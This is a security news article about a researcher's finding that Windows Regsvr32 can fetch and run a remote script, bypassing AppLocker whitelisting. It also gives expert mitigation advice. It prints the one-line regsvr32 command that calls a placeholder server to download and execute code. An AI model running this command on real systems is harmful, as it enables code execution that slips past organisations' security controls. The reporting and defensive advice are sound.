Regsvr32 is whitelisted, seen as an essential system function A researcher in Colorado has discovered a feature in Regsvr32 that allows an attacker to bypass application whitelisting protections, such as those afforded by Microsoft’s AppLocker. If the technique is used, there’s little evidence left behind for investigators, as the process doesn’t alter the system registry and in some cases comes across as normal Internet Explorer traffic.Casey Smith, a researcher in Colorado, needed to install a reverse shell, but the workstation in question was locked down by AppLocker and script rules. After some trial an error, he discovered an interesting solution:regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll“The amazing thing here is that regsvr32 is already proxy aware, uses TLS, follows redirects, etc. … And … You guessed a signed, default MS binary. So, all you need to do is host your .sct file at a location you control,” Smith wrote.Up until this week, few people – if any – knew that Regsvr32 could accept a URL for a script. This makes for some interesting developments, because all an attacker has to do is place the code block (VP or JS) inside the registration element. Smith published several proof-of-concept scripts, which other researchers confirmed work as expected. If used, this command will make Red Team engagements a bit easier, and the same can be said about criminal attacks. It’s certainly a neat trick. As Smith wrote, it doesn’t alter the registry, it doesn’t require administrative privileges, and the scripts can be called over HTTP or HTTPS.Salted Hash as reached out to Microsoft for comment, and we’ll update this story if they chose to respond. “Please note, the exploit described does not make any changes to the registry; monitoring of registry entries will not be effective,” wrote an information security consultant in Southern California who goes by the handle Munin.Regsvr32 is whitelisted, seen as an essential system function. The problem is the un-sandboxed feature and network awareness, which is why it can accept URLs (external or local).“Kind of like early Web browsers, when JavaScript first came out,” Munin explained to Salted Hash.Munin said that a possible indicator of compromise could exist, as .sct files loaded onto the system might be found in the “Temporary Internet Files” folder.There is no patch available, but Munin suggests blocking Regsvr32.exe with Windows Firewall, which removes the network awareness. It’s possible that blocks on Regsvr32.exe and Regsvr64.exe will be needed for full effectiveness.Other researchers have said that Device Guard, fully enabled with script protection will block this bypass as well, but that would require that the organization have Windows 10 Enterprise and Hyper-V on the system in question. “This is a very severe vulnerability, as it allows for arbitrary code execution by a trusted program, and should be mitigated as soon as possible,” Munin said.Update: Several readers have emailed (in addition to the comment below) to say that .sct files shouldn’t be used as an indicator, as any file extension will work. This will make investigations all the more difficult until Microsoft does something about this function. Related content news Gwinnett Medical Center investigating possible data breach After being contacted by Salted Hash, Gwinnett Medical Center has confirmed they're investigating a security incident By Steve Ragan Oct 02, 2018 6 mins Regulation Data Breach Hacking news Facebook: 30 million accounts impacted by security flaw (updated) In a blog post, Facebook’s VP of product management Guy Rosen said the attackers exploited a flaw in the website's 'View As' function By Steve Ragan Sep 28, 2018 4 mins Data Breach Security news Scammers pose as CNN's Wolf Blitzer, target security professionals Did they really think this would work? By Steve Ragan Sep 04, 2018 2 mins Phishing Social Engineering Security news Congress pushes MITRE to fix CVE program, suggests regular reviews and stable funding After a year of investigation into the Common Vulnerabilities and Exposures (CVE) program, the Energy and Commerce Committee has some suggestions as to how it can be improved By Steve Ragan Aug 27, 2018 3 mins Vulnerabilities Security Podcasts Videos Resources Events SUBSCRIBE TO OUR NEWSLETTER From our editors straight to your inbox Get started by entering your email address below. Please enter a valid email address Subscribe